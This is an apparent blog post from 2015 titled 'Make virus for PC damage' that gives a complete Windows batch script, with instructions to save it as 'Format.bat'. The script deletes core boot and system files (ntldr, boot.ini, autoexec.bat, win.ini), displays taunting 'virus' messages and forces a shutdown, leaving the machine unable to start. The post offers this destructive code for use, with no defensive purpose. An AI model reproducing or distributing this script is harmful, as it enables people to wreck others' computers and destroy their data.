Wednesday, March 4, 2015

Make virus for PC damage

Copy these code and past in your notpad


msg*Virus Activated*
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg*Computer over Virus*
shutdown -s -t 5

After past save these codes with the name of “Format.bat”


Now virus is ready.

No comments:

Post a Comment